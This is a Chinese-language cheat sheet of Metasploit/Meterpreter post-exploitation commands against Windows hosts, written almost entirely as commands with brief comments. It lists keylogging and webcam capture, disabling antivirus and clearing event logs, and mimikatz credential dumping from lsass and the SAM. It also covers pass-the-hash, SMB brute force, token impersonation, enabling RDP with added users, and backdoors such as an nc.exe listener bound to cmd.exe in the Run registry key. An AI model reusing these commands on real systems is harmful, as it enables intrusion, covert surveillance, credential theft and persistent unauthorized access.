代理
- apt-get install postgresql -y 安装
- su postgresql 进入数据库
- psql 连接psql
- \password postgres 修改密码
- \q 退出
-
信息收集
- uictl disable mouse #禁用鼠标
- uictl enable mouse #开启鼠标
- uictl disable keyboard #禁用键盘
- keyscan_start #开始键盘记录
- keyscan_dump #导出记录数据
- keyscan_stop #结束键盘记录
- webcam_list #查看摄像头
- webcam_snap #通过摄像头拍照
- webcam_stream #通过摄像头开启视频
- search -f sercret.doc 全局搜这个文件
- run killav 关闭杀软
- run post/windows/gather/enum_applications #获取安装软件信息
- run post/windows/gather/dumplinks #获取最近的文件操作
- run post/windows/gather/enum_pathes #补丁信息
- clearev #清理日志
- run get_local_subnets #获取网段信息
- run autoroute -s #手动添加网段信息
- run getcountermeasure 查看防火墙信息
用户权限
execute -H -i -f cmd.exe 创建一个隐藏的,交互的进程
- mimikatz
- load wiki 加载mimikatz
- kiwi_cmd sekurlsa::logonpasswords / privilege::debug #常规抓密码
- wifi_list_shared 查看连接的WiFi密码
- reg save HKLM\SYSTEM SYSTEM reg save HKLM\SAM SAM lsadump::sam /sam:SAM /system:SYSTEM #注册表抓hash
- procdump64.exe -accepteula -ma lsass.exe lsass.dmp mimikatz.exe “sekurlsa::minidump lsass.dmp” “sekurlsa::logonPasswords full” exit #procdump64+mimikatz获取密码,需要管理员权限
- https://www.ascotbe.com/2020/04/14/Mimikatz/
- wdigest 获取系统账户信息
- kerberos 获取明文
- msv 抓取加密的hash密码
- migrate
#将Meterpreter会话移植到指定pid值进程中 - run post/windows/manage/migrate 自动迁移进程
- run post/windows/gather/smart_hashdump #系统权限下哈希导出SAM密码
- use exploit/windows/smb/psexec #哈希攻击
- run post/mutil/recon/local_exploit_suggester #提权建议
- use auxiliary/scanner/smb/smb_login #爆破smb
- set SessionsCommunication Timeout 0 不主动关闭会话
- 窃取令牌
- steal_token 窃取
- drop_token 丢弃
- 这种方法如果不是SYSTEM权限的话是无法窃取SYSTEM权限的,只能窃取相关的权限
假冒令牌
- use incognito
- help incognit
- list_tokens -u #查看可以使用的token
- impersonate_token ‘NT AUTHORITY\SYSTEM’ #假冒SYSTEM token
- impersonate_token NT\ AUTHORITY\SYSTEM
- execute -f cmd.exe -i –t #利用假冒的token执行cmd
-
RDP和转发
portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标机的3389端口转发到本地6666端口
- run autoroute -s 192.168.159.0/24 #添加到目标环境网络
- run getgui -e #开启RDP
- run getgui -u lltest2 -p 123456 #添加用户
- run getgui -f 6661 –e #3389端口转发到6661
- run post/windows/manage/enable_rdp #开启远程桌面
- run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 #将3389端口转发到6662
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户
后门
run persistence -X -i 5 -p 6661 -r 192.168.159.134 #-i 反向连接时长,-x设置开机启动
- run metsvc –A #自动生成后门
- NC注册表后门
- upload nc.exe c:\windows\system32 #上传nc到目标主机
- reg enumkey -k HKLM\software\microsoft\windows\currentversion\run 枚举run下的key值
- reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d ‘C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe’ #把nc连接cmd放在开机启动目录下,并且设置本地端口为444
- reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v lltest_nc #查看键值
- netsh firewall add portopening TCP 444 “FireWall” ENABLE ALL #设置防火墙开放444端口,描述FireWall,需要在cmd下操作
第三方联动
use exploit/windows/local/payload_inject #会话注入
- set DisablePayloadHandler True #不设立新的监听
